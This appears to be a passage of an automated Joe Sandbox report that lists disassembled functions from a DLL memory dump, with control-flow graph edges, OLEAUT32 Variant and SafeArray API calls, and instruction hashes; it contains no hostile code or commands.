                                                                      Function 6F0CCD20 Relevance: 15.5, APIs: 10, Instructions: 485COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1930 6f0ccd20-6f0ccd97 VariantInit * 3 SafeArrayCreateVector 1931 6f0ccd99-6f0ccd9c 1930->1931 1932 6f0ccda1-6f0ccdc0 SafeArrayPutElement VariantClear 1930->1932 1931->1932 1933 6f0ccdc6-6f0ccdd1 1932->1933 1934 6f0cd2a0-6f0cd2a2 1932->1934 1935 6f0ccddd-6f0ccdef 1933->1935 1936 6f0ccdd3-6f0ccdd8 call 6f11c1e0 1933->1936 1937 6f0cd2ab-6f0cd2d7 VariantClear * 3 1934->1937 1938 6f0cd2a4-6f0cd2a5 SafeArrayDestroy 1934->1938 1935->1934 1941 6f0ccdf5-6f0cce01 1935->1941 1936->1935 1938->1937 1941->1934 1942 6f0cce07-6f0ccea4 1941->1942 1950 6f0cceba-6f0ccf2b 1942->1950 1951 6f0ccea6-6f0cceb7 1942->1951 1957 6f0ccf2d-6f0ccf3e 1950->1957 1958 6f0ccf41-6f0cd222 1950->1958 1951->1950 1957->1958 1993 6f0cd22e-6f0cd25c 1958->1993 1994 6f0cd224-6f0cd229 call 6f11c1e0 1958->1994 1997 6f0cd29d 1993->1997 1998 6f0cd25e-6f0cd269 1993->1998 1994->1993 1997->1934 1998->1997 1999 6f0cd26b-6f0cd27b call 6f0bdb30 1998->1999 1999->1997 2002 6f0cd27d-6f0cd28d call 6f0c56b0 call 6f0c6880 1999->2002 2006 6f0cd292-6f0cd299 2002->2006 2006->1997
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CCD5C
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CCD65
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CCD6B
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0CCD76
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0CCDAA
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CCDB7
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0CD2A5
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CD2B5
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CD2BB
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CD2C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                      • String ID:
                                                                      • API String ID: 2515392200-0
                                                                      • Opcode ID: 8bee8c1bf338c967216fea30b4d8e1a78e9fd7de0bd5f580379e8c1def609dbe
                                                                      • Instruction ID: 593129f44e134ed649e92d9d0fb994782904357eb291bdeec9a3c903a6aa5b31
                                                                      • Opcode Fuzzy Hash: 8bee8c1bf338c967216fea30b4d8e1a78e9fd7de0bd5f580379e8c1def609dbe
                                                                      • Instruction Fuzzy Hash: E612E475A15705AFC718DBA8DD84DAEB3B9BF8D300F144668F50AABB91CA30F841CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C66A0 Relevance: 15.2, APIs: 10, Instructions: 155COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2007 6f0c66a0-6f0c6725 VariantInit * 2 SafeArrayCreateVector 2008 6f0c672f-6f0c674f SafeArrayPutElement VariantClear 2007->2008 2009 6f0c6727-6f0c672a 2007->2009 2010 6f0c6844-6f0c6846 2008->2010 2011 6f0c6755-6f0c6772 2008->2011 2009->2008 2012 6f0c684f-6f0c6878 VariantClear * 2 2010->2012 2013 6f0c6848-6f0c6849 SafeArrayDestroy 2010->2013 2014 6f0c677c-6f0c679c SafeArrayPutElement VariantClear 2011->2014 2015 6f0c6774-6f0c6779 2011->2015 2013->2012 2014->2010 2016 6f0c67a2-6f0c67b0 2014->2016 2015->2014 2017 6f0c67bc-6f0c67ef 2016->2017 2018 6f0c67b2-6f0c67b7 call 6f11c1e0 2016->2018 2020 6f0c67f4-6f0c67f6 2017->2020 2018->2017 2020->2010 2021 6f0c67f8-6f0c6805 2020->2021 2021->2010 2022 6f0c6807-6f0c681c call 6f0bdb30 2021->2022 2022->2010 2025 6f0c681e-6f0c683f call 6f0c56b0 call 6f0c6880 2022->2025 2025->2010
                                                                      APIs
                                                                      • VariantInit.OLEAUT32 ref: 6F0C66DB
                                                                      • VariantInit.OLEAUT32 ref: 6F0C66EA
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F0C6700
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C673A
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C6747
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C6787
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C6794
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0C6849
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C685A
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C6861
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
                                                                      • String ID:
                                                                      • API String ID: 551789342-0
                                                                      • Opcode ID: c6b261301e92188e1da339e7ad0dc584cddbf0a5c0eb8b176fb3a8b5c49c7bed
                                                                      • Instruction ID: da9824fe774c8f86471f3a904fdc46e82500a16b1f30087e187296f8b92a2ba5
                                                                      • Opcode Fuzzy Hash: c6b261301e92188e1da339e7ad0dc584cddbf0a5c0eb8b176fb3a8b5c49c7bed
                                                                      • Instruction Fuzzy Hash: D1515D76104646AFC700DF64C844B9BBBE9FFC9724F00865DF9599B250DB30E905CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C6B10 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 364COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2030 6f0c6b10-6f0c6b6c call 6f0d2500 2033 6f0c6f1f-6f0c6f22 2030->2033 2034 6f0c6b72-6f0c6b77 2030->2034 2035 6f0c6f25-6f0c6f46 InterlockedCompareExchange 2033->2035 2034->2033 2036 6f0c6b7d-6f0c6b91 call 6f0b51e0 2034->2036 2037 6f0c6f48-6f0c6f58 2035->2037 2038 6f0c6f5b-6f0c6f6f 2035->2038 2036->2033 2041 6f0c6b97-6f0c6bc7 call 6f0d2e20 2036->2041 2037->2038 2041->2033 2045 6f0c6bcd-6f0c6bee 2041->2045 2046 6f0c6bf1-6f0c6bff 2045->2046 2047 6f0c6f0e-6f0c6f10 2046->2047 2048 6f0c6c05-6f0c6c10 2046->2048 2050 6f0c6f19-6f0c6f1d 2047->2050 2051 6f0c6f12-6f0c6f13 SafeArrayDestroy 2047->2051 2048->2047 2049 6f0c6c16-6f0c6c1f 2048->2049 2049->2047 2052 6f0c6c25-6f0c6c2e 2049->2052 2050->2033 2050->2035 2051->2050 2052->2047 2053 6f0c6c34-6f0c6c42 call 6f0d2440 2052->2053 2053->2047 2056 6f0c6c48-6f0c6c5d call 6f0b51e0 2053->2056 2056->2047 2059 6f0c6c63-6f0c6c70 call 6f0d28c0 2056->2059 2059->2047 2062 6f0c6c76-6f0c6c78 2059->2062 2062->2033 2063 6f0c6c7e-6f0c6c93 SafeArrayGetLBound 2062->2063 2063->2047 2064 6f0c6c99-6f0c6cae SafeArrayGetUBound 2063->2064 2064->2047 2065 6f0c6cb4-6f0c6ccf SafeArrayAccessData 2064->2065 2065->2047 2066 6f0c6cd5-6f0c6d01 call 6f0c5760 SafeArrayUnaccessData 2065->2066 2066->2047 2069 6f0c6d07-6f0c6d15 call 6f0d2440 2066->2069 2069->2047 2072 6f0c6d1b-6f0c6d44 call 6f0b15a0 call 6f0b1690 call 6f109bb5 2069->2072 2079 6f0c6d46-6f0c6d4f 2072->2079 2080 6f0c6d51 2072->2080 2081 6f0c6d53-6f0c6d6a call 6f0b5050 call 6f109bb5 2079->2081 2080->2081 2086 6f0c6d6c-6f0c6d75 2081->2086 2087 6f0c6d77 2081->2087 2088 6f0c6d79-6f0c6d8b call 6f0b5050 call 6f109bb5 2086->2088 2087->2088 2093 6f0c6d8d-6f0c6d96 2088->2093 2094 6f0c6d98 2088->2094 2095 6f0c6d9a-6f0c6db7 call 6f0b5050 call 6f0b50c0 call 6f109bb5 2093->2095 2094->2095 2102 6f0c6db9-6f0c6dc5 2095->2102 2103 6f0c6dc7 2095->2103 2104 6f0c6dc9-6f0c6dec call 6f0b5050 call 6f0b50c0 call 6f109bb5 2102->2104 2103->2104 2111 6f0c6dee-6f0c6df7 2104->2111 2112 6f0c6df9 2104->2112 2113 6f0c6dfb-6f0c6e1e call 6f0b5050 call 6f0b50c0 call 6f109bb5 2111->2113 2112->2113 2120 6f0c6e2b 2113->2120 2121 6f0c6e20-6f0c6e29 2113->2121 2122 6f0c6e2d-6f0c6e3f call 6f0b5050 call 6f109bb5 2120->2122 2121->2122 2127 6f0c6e50 2122->2127 2128 6f0c6e41-6f0c6e4e 2122->2128 2129 6f0c6e52-6f0c6e64 call 6f0b5050 call 6f109bb5 2127->2129 2128->2129 2134 6f0c6e66-6f0c6e6f 2129->2134 2135 6f0c6e71 2129->2135 2136 6f0c6e73-6f0c6ea0 call 6f0b5050 call 6f0b50c0 * 2 call 6f109bb5 2134->2136 2135->2136 2145 6f0c6ead 2136->2145 2146 6f0c6ea2-6f0c6eab 2136->2146 2147 6f0c6eaf-6f0c6ee2 call 6f0b5050 call 6f0b50c0 * 2 call 6f0b2a40 2145->2147 2146->2147 2156 6f0c6ee4-6f0c6eea 2147->2156 2157 6f0c6ef1-6f0c6f0b call 6f0b2f70 call 6f0b1630 2147->2157 2156->2157 2158 6f0c6eec-6f0c6eef 2156->2158 2157->2047 2158->2157
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6F0C6C8B
                                                                      • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6F0C6CA6
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6F0C6CC7
                                                                        • Part of subcall function 6F0C5760: std::tr1::_Xweak.LIBCPMT ref: 6F0C5769
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F0C6CF9
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0C6F13
                                                                      • InterlockedCompareExchange.KERNEL32(6F14C6A4,45524548,4B4F4F4C), ref: 6F0C6F34
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                      • String ID: .o$ .o
                                                                      • API String ID: 2722669376-3732043186
                                                                      • Opcode ID: 399041f54c12395371ebb9d73d5cdf90979540d30ff604ad36a61f30da6d035e
                                                                      • Instruction ID: bb240e6285a6b129d451f4cc5e201a6ab84602830f55656f3fa04683716c9a0f
                                                                      • Opcode Fuzzy Hash: 399041f54c12395371ebb9d73d5cdf90979540d30ff604ad36a61f30da6d035e
                                                                      • Instruction Fuzzy Hash: 50D1E471A003089FDB20DFA8CC90BAE77F9EF46314F148569E509AB381D775E845CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C4170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C41AF
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C41B5
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0C41C0
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F0C41F5
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4201
                                                                      • std::tr1::_Xweak.LIBCPMT ref: 6F0C4450
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0C446D
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C447D
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4483
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                      • String ID:
                                                                      • API String ID: 1774866819-0
                                                                      • Opcode ID: dfda79ad1e9e1baba15107583e93b2d7a2c61579f01c0e080e5f2f385576929e
                                                                      • Instruction ID: fee73fc79cab55d12851fb2bb73393ea12be6ab9754a66511ccb6c990a089f9f
                                                                      • Opcode Fuzzy Hash: dfda79ad1e9e1baba15107583e93b2d7a2c61579f01c0e080e5f2f385576929e
                                                                      • Instruction Fuzzy Hash: 4CB12575600609AFCB14DF98C884EEEB7F9BF8D310F158568E50AAB795DA34F841CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CC850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CC88F
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CC895
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0CC8A0
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F0CC8D5
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CC8E1
                                                                      • std::tr1::_Xweak.LIBCPMT ref: 6F0CCB1C
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0CCB39
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CCB49
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CCB4F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                      • String ID:
                                                                      • API String ID: 1774866819-0
                                                                      • Opcode ID: 35ef0387bc20812e9aa3c5d7e6a9b86866b5d2dfe1a25fb22708f06016c51ebe
                                                                      • Instruction ID: cb4cdbe7e2c9c45c29794da7d7aa7cef09c2c4be043b8a7cdd30839d9f6fbca3
                                                                      • Opcode Fuzzy Hash: 35ef0387bc20812e9aa3c5d7e6a9b86866b5d2dfe1a25fb22708f06016c51ebe
                                                                      • Instruction Fuzzy Hash: 1AB12775A00649EFCB14DF98C884EAEB7F5BF8D310F148569E50AAB791CA34B841CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CC530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CC56F
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CC575
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0CC580
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0CC5B5
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CC5C1
                                                                      • std::tr1::_Xweak.LIBCPMT ref: 6F0CC7D4
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0CC7F1
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CC801
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CC807
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                      • String ID:
                                                                      • API String ID: 1774866819-0
                                                                      • Opcode ID: 56781c83367eccfef293b0f6969a890b40900c69499cad03c51463daa6cd71cd
                                                                      • Instruction ID: 8a1798213ebdfb212fc8f6694a54a247b75788b8b5d4d6e782cbbb6480644bd1
                                                                      • Opcode Fuzzy Hash: 56781c83367eccfef293b0f6969a890b40900c69499cad03c51463daa6cd71cd
                                                                      • Instruction Fuzzy Hash: 8CA13875A00649AFCB14DF99C884EAEB7F5FF8C310F14866DE506AB791CA34B841CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C3F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0C3F7B
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0C3F8D
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C3FB7
                                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F0C3FD0
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C40C9
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4105
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0C4123
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4157
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C4168
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
                                                                      • String ID:
                                                                      • API String ID: 758290628-0
                                                                      • Opcode ID: 8588b25dbaa19172a0ae4f72e54795a41fe60f78e985ad04776e374047ead758
                                                                      • Instruction ID: f77fdf2e27c75dc5e921ca68eb014b68a432a3d856d4e35f342a4545db81e34c
                                                                      • Opcode Fuzzy Hash: 8588b25dbaa19172a0ae4f72e54795a41fe60f78e985ad04776e374047ead758
                                                                      • Instruction Fuzzy Hash: DF717B76208381AFC700DFA8C8C4A9FBBE4BB99754F144A2DF69587250C735E945CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C6880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C68B2
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C68BD
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F0C68D7
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C68FD
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C6909
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0C6923
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0C6981
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C699E
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C69A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
                                                                      • String ID:
                                                                      • API String ID: 3529038988-0
                                                                      • Opcode ID: e7192c70218315dfe326fd08f9ea49d2df47297f26cce18d8c09a3bb8345c83c
                                                                      • Instruction ID: 5f3e979aaecabdef06ab470b00b535c2f4e076f7b70c9eb1475b8c747a444528
                                                                      • Opcode Fuzzy Hash: e7192c70218315dfe326fd08f9ea49d2df47297f26cce18d8c09a3bb8345c83c
                                                                      • Instruction Fuzzy Hash: 124174B2900619AFDB00DFA4C844BEFBBB8FF99360F14411AE905A7341DB75A945CBA1
